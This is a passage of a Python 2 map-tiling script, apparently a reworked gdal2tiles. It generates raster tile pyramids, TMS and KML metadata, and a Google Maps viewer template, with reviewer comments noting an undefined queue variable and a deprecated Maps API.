                # transformed to EPSG:4326 for KML.
                pixelsizex = 2 ** (self.tmaxz - z) * self.out_gt[1]  # X-pixel size in level
                pixelsizey = 2 ** (self.tmaxz - z) * self.out_gt[1]  # Y-pixel size in level (usually -1*pixelsizex)
                west = self.out_gt[0] + x * self.tilesize \
                    * pixelsizex
                east = west + self.tilesize * pixelsizex
                south = self.ominy + y * self.tilesize * pixelsizex
                north = south + self.tilesize * pixelsizex
                if not self.isepsg4326:
                    # Transformation to EPSG:4326 (WGS84 datum)
                    (west, south) = self.ct.TransformPoint(west,
                            south)[:2]
                    (east, north) = self.ct.TransformPoint(east,
                            north)[:2]
                return (south, west, north, east)

            self.tileswne = rastertileswne
        else:
            self.tileswne = lambda x, y, z: (0, 0, 0, 0)
# -------------------------------------------------------------------------
def generate_metadata(self):
    """Generation of main metadata files and HTML viewers (metadata related to particular tiles are generated during the tile processing).

    Depending on profile and options this writes googlemaps.html,
    openlayers.html, tilemapresource.xml and the root doc.kml into
    self.output, and stores the lat/lon bounds in self.swne.
    """

    if not os.path.exists(self.output):
        os.makedirs(self.output)

    def _write(basename, make_content):
        # Write one metadata file. Honours --resume (an existing file is
        # left untouched and its content is not even rendered, matching
        # the original short-circuit) and always closes the handle.
        path = os.path.join(self.output, basename)
        if self.options.resume and os.path.exists(path):
            return
        f = open(path, 'w')
        try:
            f.write(make_content())
        finally:
            f.close()

    if self.options.profile == 'mercator':
        # Bounds in lat/lon, clamped to the web-mercator world extent.
        (south, west) = self.mercator.MetersToLatLon(self.ominx,
                self.ominy)
        (north, east) = self.mercator.MetersToLatLon(self.omaxx,
                self.omaxy)
        (south, west) = (max(-85.05112878, south), max(-180.0, west))
        (north, east) = (min(85.05112878, north), min(180.0, east))
        self.swne = (south, west, north, east)

        # Generate googlemaps.html (only offered for the mercator profile)
        if self.options.webviewer in ('all', 'google'):
            _write('googlemaps.html', self.generate_googlemaps)

        # Generate openlayers.html
        if self.options.webviewer in ('all', 'openlayers'):
            _write('openlayers.html', self.generate_openlayers)
    elif self.options.profile == 'geodetic':
        (west, south) = (self.ominx, self.ominy)
        (east, north) = (self.omaxx, self.omaxy)
        (south, west) = (max(-90.0, south), max(-180.0, west))
        (north, east) = (min(90.0, north), min(180.0, east))
        self.swne = (south, west, north, east)

        # Generate openlayers.html
        if self.options.webviewer in ('all', 'openlayers'):
            _write('openlayers.html', self.generate_openlayers)
    elif self.options.profile == 'raster':
        # Raster profile keeps the native bounds without clamping.
        (west, south) = (self.ominx, self.ominy)
        (east, north) = (self.omaxx, self.omaxy)
        self.swne = (south, west, north, east)

        # Generate openlayers.html
        if self.options.webviewer in ('all', 'openlayers'):
            _write('openlayers.html', self.generate_openlayers)

    # Generate tilemapresource.xml.
    _write('tilemapresource.xml', self.generate_tilemapresource)

    if self.kml:
        # TODO: Maybe problem for not automatically generated tminz
        # The root KML should contain links to all tiles in the tminz level
        children = []
        (xmin, ymin, xmax, ymax) = self.tminmax[self.tminz]
        for x in range(xmin, xmax + 1):
            for y in range(ymin, ymax + 1):
                children.append([x, y, self.tminz])

        # Generate Root KML
        _write('doc.kml', lambda: self.generate_kml(None, None,
               None, children))
# -------------------------------------------------------------------------
def generate_base_tiles(self, cpu):
    """Generation of the base tiles (the lowest in the pyramid) directly from the input raster

    cpu -- index of this worker process; tiles are striped round-robin
    across self.options.processes workers via the modulo test on the
    running tile counter 'ti' below, so each worker renders only its
    own share of the zoom-tmaxz tiles.
    """

    # NOTE(review): 'queue' is not defined in this method -- presumably a
    # module-level progress queue shared with the parent process; confirm.
    if self.options.verbose:
        # mx, my = self.out_gt[0], self.out_gt[3] # OriginX, OriginY
        # px, py = self.mercator.MetersToPixels( mx, my, self.tmaxz)
        # print "Pixel coordinates:", px, py, (mx, my)
        print ''
        print 'Tiles generated from the max zoom level:'
        print '----------------------------------------'
        print ''

    # Set the bounds
    (tminx, tminy, tmaxx, tmaxy) = self.tminmax[self.tmaxz]

    # Just the center tile
    # tminx = tminx+ (tmaxx - tminx)/2
    # tminy = tminy+ (tmaxy - tminy)/2
    # tmaxx = tminx
    # tmaxy = tminy

    ds = self.out_ds
    # Output tiles carry the data bands plus one extra alpha band
    # (written below via band_list=[tilebands]).
    tilebands = self.dataBandsCount + 1
    querysize = self.querysize

    if self.options.verbose:
        print ('dataBandsCount: ', self.dataBandsCount)
        print ('tilebands: ', tilebands)

    # print tminx, tminy, tmaxx, tmaxy
    tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))

    # print tcount
    ti = 0
    # Default (TMS) order walks y from top down; leaflet/XYZ walks upward.
    yrange = range(tmaxy, tminy - 1, -1)
    if self.options.leaflet:
        yrange = range(tminy, tmaxy + 1)
    tz = self.tmaxz
    for ty in yrange:
        for tx in range(tminx, tmaxx + 1):

            if self.stopped:
                break
            ti += 1

            # Skip tiles belonging to other worker processes.
            if (ti - 1) % self.options.processes != cpu:
                continue

            tilefilename = os.path.join(self.output, str(tz),
                    str(tx), '%s.%s' % (ty, self.tileext))
            if self.options.verbose:
                print (ti, '/', tcount, tilefilename) # , "( TileMapService: z / x / y )"

            if self.options.resume and os.path.exists(tilefilename):
                if self.options.verbose:
                    print 'Tile generation skiped because of --resume'
                else:
                    queue.put(tcount)
                continue

            # Create directories for the tile
            if not os.path.exists(os.path.dirname(tilefilename)):
                os.makedirs(os.path.dirname(tilefilename))

            if self.options.profile == 'mercator':

                # Tile bounds in EPSG:900913
                b = self.mercator.TileBounds(tx, ty, tz)
            elif self.options.profile == 'geodetic':
                b = self.geodetic.TileBounds(tx, ty, tz)

            # print "\tgdalwarp -ts 256 256 -te %s %s %s %s %s %s_%s_%s.tif" % ( b[0], b[1], b[2], b[3], "tiles.vrt", tz, tx, ty)

            # Don't scale up by nearest neighbour, better change the querysize
            # to the native resolution (and return smaller query tile) for scaling

            if self.options.profile in ('mercator', 'geodetic'):
                (rb, wb) = self.geo_query(ds, b[0], b[3], b[2],
                        b[1])

                nativesize = wb[0] + wb[2] # Pixel size in the raster covering query geo extent
                if self.options.verbose:
                    print ('\tNative Extent (querysize',
                           nativesize, '): ', rb, wb)

                # Tile bounds in raster coordinates for ReadRaster query
                (rb, wb) = self.geo_query(
                    ds,
                    b[0],
                    b[3],
                    b[2],
                    b[1],
                    querysize=querysize,
                    )

                (rx, ry, rxsize, rysize) = rb
                (wx, wy, wxsize, wysize) = wb
            else:

                # 'raster' profile:

                tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom
                xsize = self.out_ds.RasterXSize # size of the raster in pixels
                ysize = self.out_ds.RasterYSize
                if tz >= self.nativezoom:
                    querysize = self.tilesize # int(2**(self.nativezoom-tz) * self.tilesize)

                rx = tx * tsize
                # Edge tiles may be narrower than a full tile.
                rxsize = 0
                if tx == tmaxx:
                    rxsize = xsize % tsize
                if rxsize == 0:
                    rxsize = tsize

                rysize = 0
                if ty == tmaxy:
                    rysize = ysize % tsize
                if rysize == 0:
                    rysize = tsize

                if self.options.leaflet:
                    ry = ty * tsize
                else:
                    ry = ysize - ty * tsize - rysize

                (wx, wy) = (0, 0)
                (wxsize, wysize) = (int(rxsize / float(tsize)
                        * self.tilesize), int(rysize / float(tsize)
                        * self.tilesize))
                if not self.options.leaflet:
                    if wysize != self.tilesize:
                        wy = self.tilesize - wysize

            if self.options.verbose:
                print ('\tReadRaster Extent: ', (rx, ry, rxsize,
                        rysize), (wx, wy, wxsize, wysize))

            # Query is in 'nearest neighbour' but can be bigger in then the tilesize
            # We scale down the query to the tilesize by supplied algorithm.

            # Tile dataset in memory
            dstile = self.mem_drv.Create('', self.tilesize,
                    self.tilesize, tilebands)
            data = ds.ReadRaster(
                rx,
                ry,
                rxsize,
                rysize,
                wxsize,
                wysize,
                band_list=list(range(1, self.dataBandsCount + 1)),
                )
            alpha = self.alphaband.ReadRaster(
                rx,
                ry,
                rxsize,
                rysize,
                wxsize,
                wysize,
                )

            if self.tilesize == querysize:

                # Use the ReadRaster result directly in tiles ('nearest neighbour' query)
                dstile.WriteRaster(
                    wx,
                    wy,
                    wxsize,
                    wysize,
                    data,
                    band_list=list(range(1, self.dataBandsCount
                            + 1)),
                    )
                dstile.WriteRaster(
                    wx,
                    wy,
                    wxsize,
                    wysize,
                    alpha,
                    band_list=[tilebands],
                    )
            else:

                # Note: For source drivers based on WaveLet compression (JPEG2000, ECW, MrSID)
                # the ReadRaster function returns high-quality raster (not ugly nearest neighbour)
                # TODO: Use directly 'near' for WaveLet files

                # Big ReadRaster query in memory scaled to the tilesize - all but 'near' algo
                dsquery = self.mem_drv.Create('', querysize,
                        querysize, tilebands)

                # TODO: fill the null value in case a tile without alpha is produced (now only png tiles are supported)
                # for i in range(1, tilebands+1):
                #     dsquery.GetRasterBand(1).Fill(tilenodata)

                dsquery.WriteRaster(
                    wx,
                    wy,
                    wxsize,
                    wysize,
                    data,
                    band_list=list(range(1, self.dataBandsCount
                            + 1)),
                    )
                dsquery.WriteRaster(
                    wx,
                    wy,
                    wxsize,
                    wysize,
                    alpha,
                    band_list=[tilebands],
                    )

                self.scale_query_to_tile(dsquery, dstile,
                        tilefilename)
                del dsquery

            del data

            if self.options.resampling != 'antialias':

                # Write a copy of tile to png/jpg
                # (antialias mode writes the file itself in scale_query_to_tile)
                self.out_drv.CreateCopy(tilefilename, dstile,
                        strict=0)

            del dstile

            # Create a KML file for this tile.
            if self.kml:
                kmlfilename = os.path.join(self.output, str(tz),
                        str(tx), '%d.kml' % ty)
                if not self.options.resume \
                    or not os.path.exists(kmlfilename):
                    f = open(kmlfilename, 'w')
                    f.write(self.generate_kml(tx, ty, tz))
                    f.close()

            if not self.options.verbose:
                queue.put(tcount)
# -------------------------------------------------------------------------
def generate_overview_tiles(self, cpu, tz):
    """Generation of the overview tiles (higher in the pyramid) based on existing tiles

    cpu -- index of this worker process (same striping scheme as
    generate_base_tiles).
    tz -- zoom level to generate; each tile is assembled from up to
    four already-written tiles of level tz + 1.
    """

    # Data bands plus one alpha band, as in generate_base_tiles.
    tilebands = self.dataBandsCount + 1

    # Usage of existing tiles: from 4 underlying tiles generate one as overview.

    # tcount counts tiles of ALL overview levels (used for progress totals).
    tcount = 0
    for z in range(self.tmaxz - 1, self.tminz - 1, -1):
        (tminx, tminy, tmaxx, tmaxy) = self.tminmax[z]
        tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy
                - tminy))

    ti = 0

    # querysize = tilesize * 2

    (tminx, tminy, tmaxx, tmaxy) = self.tminmax[tz]
    # Default (TMS) order walks y from top down; leaflet/XYZ walks upward.
    yrange = range(tmaxy, tminy - 1, -1)
    if self.options.leaflet:
        yrange = range(tminy, tmaxy + 1)
    for ty in yrange:
        for tx in range(tminx, tmaxx + 1):

            if self.stopped:
                break

            ti += 1

            # Skip tiles belonging to other worker processes.
            if (ti - 1) % self.options.processes != cpu:
                continue

            tilefilename = os.path.join(self.output, str(tz),
                    str(tx), '%s.%s' % (ty, self.tileext))

            if self.options.verbose:
                print (ti, '/', tcount, tilefilename) # , "( TileMapService: z / x / y )"

            if self.options.resume and os.path.exists(tilefilename):
                if self.options.verbose:
                    print 'Tile generation skiped because of --resume'
                else:
                    queue.put(tcount)
                continue

            # Create directories for the tile
            if not os.path.exists(os.path.dirname(tilefilename)):
                os.makedirs(os.path.dirname(tilefilename))

            # Query canvas is 2x2 child tiles; scaled down to one tile below.
            dsquery = self.mem_drv.Create('', 2 * self.tilesize, 2
                    * self.tilesize, tilebands)

            # TODO: fill the null value
            # for i in range(1, tilebands+1):
            #     dsquery.GetRasterBand(1).Fill(tilenodata)

            dstile = self.mem_drv.Create('', self.tilesize,
                    self.tilesize, tilebands)

            # TODO: Implement more clever walking on the tiles with cache functionality
            # probably walk should start with reading of four tiles from top left corner
            # Hilbert curve

            children = []

            # Read the tiles and write them to query window
            for y in range(2 * ty, 2 * ty + 2):
                for x in range(2 * tx, 2 * tx + 2):
                    (minx, miny, maxx, maxy) = self.tminmax[tz + 1]
                    if x >= minx and x <= maxx and y >= miny and y \
                        <= maxy:
                        dsquerytile = \
                            gdal.Open(os.path.join(self.output,
                                str(tz + 1), str(x), '%s.%s' % (y,
                                self.tileext)), gdal.GA_ReadOnly)

                        # Place the child tile in the proper quadrant of the
                        # 2x2 query canvas; y orientation depends on --leaflet.
                        if self.options.leaflet:
                            if ty:
                                tileposy = y % (2 * ty) \
                                    * self.tilesize
                            elif ty == 0 and y == 1:
                                tileposy = self.tilesize
                            else:
                                tileposy = 0
                        else:
                            if ty == 0 and y == 1 or ty != 0 and y \
                                % (2 * ty) != 0:
                                tileposy = 0
                            else:
                                tileposy = self.tilesize

                        if tx:
                            tileposx = x % (2 * tx) * self.tilesize
                        elif tx == 0 and x == 1:
                            tileposx = self.tilesize
                        else:
                            tileposx = 0

                        dsquery.WriteRaster(
                            tileposx,
                            tileposy,
                            self.tilesize,
                            self.tilesize,
                            dsquerytile.ReadRaster(0, 0,
                                    self.tilesize, self.tilesize),
                            band_list=list(range(1, tilebands
                                    + 1)),
                            )

                        children.append([x, y, tz + 1])

            self.scale_query_to_tile(dsquery, dstile, tilefilename)

            # Write a copy of tile to png/jpg
            if self.options.resampling != 'antialias':

                # Write a copy of tile to png/jpg
                self.out_drv.CreateCopy(tilefilename, dstile,
                        strict=0)

            if self.options.verbose:
                print (
                    '\tbuild from zoom',
                    tz + 1,
                    ' tiles:',
                    (2 * tx, 2 * ty),
                    (2 * tx + 1, 2 * ty),
                    (2 * tx, 2 * ty + 1),
                    (2 * tx + 1, 2 * ty + 1),
                    )

            # Create a KML file for this tile.
            if self.kml:
                f = open(os.path.join(self.output, '%d/%d/%d.kml'
                         % (tz, tx, ty)), 'w')
                f.write(self.generate_kml(tx, ty, tz, children))
                f.close()

            if not self.options.verbose:
                queue.put(tcount)
# -------------------------------------------------------------------------
def geo_query(
    self,
    ds,
    ulx,
    uly,
    lrx,
    lry,
    querysize=0,
    ):
    """For given dataset and query in cartographic coordinates
    returns parameters for ReadRaster() in raster coordinates and
    x/y shifts (for border tiles). If the querysize is not given, the
    extent is returned in the native resolution of dataset ds."""

    gt = ds.GetGeoTransform()

    # Map the geographic query window onto pixel coordinates.
    rx = int((ulx - gt[0]) / gt[1] + 0.001)
    ry = int((uly - gt[3]) / gt[5] + 0.001)
    rxsize = int((lrx - ulx) / gt[1] + 0.5)
    rysize = int((lry - uly) / gt[5] + 0.5)

    # Target (write) window: native resolution unless a fixed
    # querysize was requested.
    if querysize:
        (wxsize, wysize) = (querysize, querysize)
    else:
        (wxsize, wysize) = (rxsize, rysize)

    # Clip against the left raster edge, shifting the write window by
    # the proportional amount of the overhang.
    wx = 0
    if rx < 0:
        overhang = abs(rx)
        wx = int(wxsize * (float(overhang) / rxsize))
        wxsize = wxsize - wx
        rxsize = rxsize - int(rxsize * (float(overhang) / rxsize))
        rx = 0

    # Clip against the right raster edge.
    if rx + rxsize > ds.RasterXSize:
        wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
        rxsize = ds.RasterXSize - rx

    # Same clipping for the vertical axis: top edge first ...
    wy = 0
    if ry < 0:
        overhang = abs(ry)
        wy = int(wysize * (float(overhang) / rysize))
        wysize = wysize - wy
        rysize = rysize - int(rysize * (float(overhang) / rysize))
        ry = 0

    # ... then the bottom edge.
    if ry + rysize > ds.RasterYSize:
        wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
        rysize = ds.RasterYSize - ry

    return ((rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# -------------------------------------------------------------------------
def scale_query_to_tile(
    self,
    dsquery,
    dstile,
    tilefilename='',
    ):
    """Scales down query dataset to the tile dataset

    Dispatches on self.options.resampling: 'average' uses
    gdal.RegenerateOverview(), 'antialias' uses PIL (and also saves the
    tile file itself), anything else goes through gdal.ReprojectImage().
    """

    querysize = dsquery.RasterXSize
    tilesize = dstile.RasterXSize
    tilebands = dstile.RasterCount

    method = self.options.resampling
    if method == 'average':

        # Average each band independently.
        # Black border around NODATA
        # if i != 4:
        #   dsquery.GetRasterBand(i).SetNoDataValue(0)
        for band in range(1, tilebands + 1):
            res = gdal.RegenerateOverview(dsquery.GetRasterBand(band),
                    dstile.GetRasterBand(band), 'average')
            if res != 0:
                self.error('RegenerateOverview() failed on %s, error %d'
                           % (tilefilename, res))
    elif method == 'antialias':

        # Scaling by PIL (Python Imaging Library) - improved Lanczos.
        # Gather all bands into one RGBA numpy array first.
        array = numpy.zeros((querysize, querysize, tilebands),
                            numpy.uint8)
        for band in range(tilebands):
            array[:, :, band] = \
                gdalarray.BandReadAsArray(dsquery.GetRasterBand(band
                    + 1), 0, 0, querysize, querysize)
        im = Image.fromarray(array, 'RGBA') # Always four bands
        im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS)

        # Composite over an already existing tile so reruns merge.
        if os.path.exists(tilefilename):
            im0 = Image.open(tilefilename)
            im1 = Image.composite(im1, im0, im1)
        im1.save(tilefilename, self.tiledriver)
    else:

        # Other algorithms are implemented by gdal.ReprojectImage():
        # fake geotransforms so the query maps exactly onto the tile.
        scale = tilesize / float(querysize)
        dsquery.SetGeoTransform((0.0, scale, 0.0, 0.0, 0.0, scale))
        dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))

        res = gdal.ReprojectImage(dsquery, dstile, None, None,
                self.resampling)
        if res != 0:
            self.error('ReprojectImage() failed on %s, error %d'
                       % (tilefilename, res))
# -------------------------------------------------------------------------
def generate_tilemapresource(self):
    """
    Template for tilemapresource.xml. Returns filled string. Expected variables:
    title, north, south, east, west, isepsg4326, projection, publishurl,
    zoompixels, tilesize, tileformat, profile
    """

    args = {
        'title': self.options.title,
        'tilesize': self.tilesize,
        'tileformat': self.tileext,
        'publishurl': self.options.url,
        'profile': self.options.profile,
        }
    (args['south'], args['west'], args['north'], args['east']) = \
        self.swne

    # Spatial reference system advertised to TMS clients.
    if self.options.profile == 'mercator':
        args['srs'] = 'EPSG:900913'
    elif self.options.profile == 'geodetic':
        args['srs'] = 'EPSG:4326'
    elif self.options.s_srs:
        args['srs'] = self.options.s_srs
    elif self.out_srs:
        args['srs'] = self.out_srs.ExportToWkt()
    else:
        args['srs'] = ''

    s = \
        """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tilesize)d" height="%(tilesize)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" \
        % args

    # One <TileSet> entry per zoom level; only the units-per-pixel
    # expression differs between profiles.
    for z in range(self.tminz, self.tmaxz + 1):
        if self.options.profile == 'raster':
            upp = 2 ** (self.nativezoom - z) * self.out_gt[1]
        elif self.options.profile == 'mercator':
            upp = 156543.0339 / 2 ** z
        elif self.options.profile == 'geodetic':
            upp = 0.703125 / 2 ** z
        else:
            continue
        s += \
            """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" \
            % (args['publishurl'], z, upp, z)

    s += """ </TileSets>
</TileMap>
"""
    return s
# -------------------------------------------------------------------------
def generate_kml(
    self,
    tx,
    ty,
    tz,
    children=None,
    **args
    ):
    """
    Template for the KML. Returns filled string.

    tx, ty, tz -- tile coordinates; pass tx=None to generate the root
    doc.kml instead of a per-tile KML document.
    children -- list of [x, y, z] child tiles linked via <NetworkLink>;
    defaults to no children.
    args -- optional template overrides (tilesize, minlodpixels, ...).
    """

    # Use a None sentinel instead of the original mutable default
    # argument ([]); behaviour is identical since the list was never
    # mutated, but this avoids the shared-default pitfall.
    if children is None:
        children = []

    (args['tx'], args['ty'], args['tz']) = (tx, ty, tz)
    args['tileformat'] = self.tileext
    if 'tilesize' not in args:
        args['tilesize'] = self.tilesize

    if 'minlodpixels' not in args:
        args['minlodpixels'] = int(args['tilesize'] / 2) # / 2.56) # default 128
    if 'maxlodpixels' not in args:
        args['maxlodpixels'] = int(args['tilesize'] * 8) # 1.7) # default 2048 (used to be -1)
    if children == []:
        args['maxlodpixels'] = -1

    if tx is None:
        tilekml = False
        args['title'] = self.options.title
    else:
        tilekml = True
        args['title'] = '%d/%d/%d.kml' % (tz, tx, ty)
        (args['south'], args['west'], args['north'], args['east'
         ]) = self.tileswne(tx, ty, tz)

    if tx == 0:
        args['drawOrder'] = 2 * tz + 1
    elif tx is not None:
        args['drawOrder'] = 2 * tz
    else:
        args['drawOrder'] = 0

    url = self.options.url
    if not url:
        if tilekml:
            url = '../../'
        else:
            url = ''

    s = \
        """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" \
        % args
    if tilekml:
        s += \
            """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" \
            % args

    # Emit one <NetworkLink> per child tile so Google Earth loads the
    # finer levels on demand.
    for (cx, cy, cz) in children:
        (csouth, cwest, cnorth, ceast) = self.tileswne(cx, cy, cz)
        s += \
            """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" \
            % (
            cz,
            cx,
            cy,
            args['tileformat'],
            cnorth,
            csouth,
            ceast,
            cwest,
            args['minlodpixels'],
            url,
            cz,
            cx,
            cy,
            )

    s += """ </Document>
</kml>
"""
    return s
# -------------------------------------------------------------------------
def generate_googlemaps(self):
    """
    Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
    It returns filled string. Expected variables:
    title, googlemapskey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl

    NOTE(review): the emitted page targets the Google Maps JavaScript
    API v2 (GMap2, GTileLayerOverlay), which has long been deprecated --
    the viewer may no longer work against current Google endpoints.
    """

    # Template substitution values; all keys below are referenced as
    # %(key)s / %(key)d inside the HTML/JS template strings.
    args = {}
    args['title'] = self.options.title
    args['googlemapskey'] = self.options.googlekey
    (args['south'], args['west'], args['north'], args['east']) = \
        self.swne
    args['minzoom'] = self.tminz
    args['maxzoom'] = self.tmaxz
    args['tilesize'] = self.tilesize
    args['tileformat'] = self.tileext
    args['publishurl'] = self.options.url
    args['copyright'] = self.options.copyright

    s = \
        """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
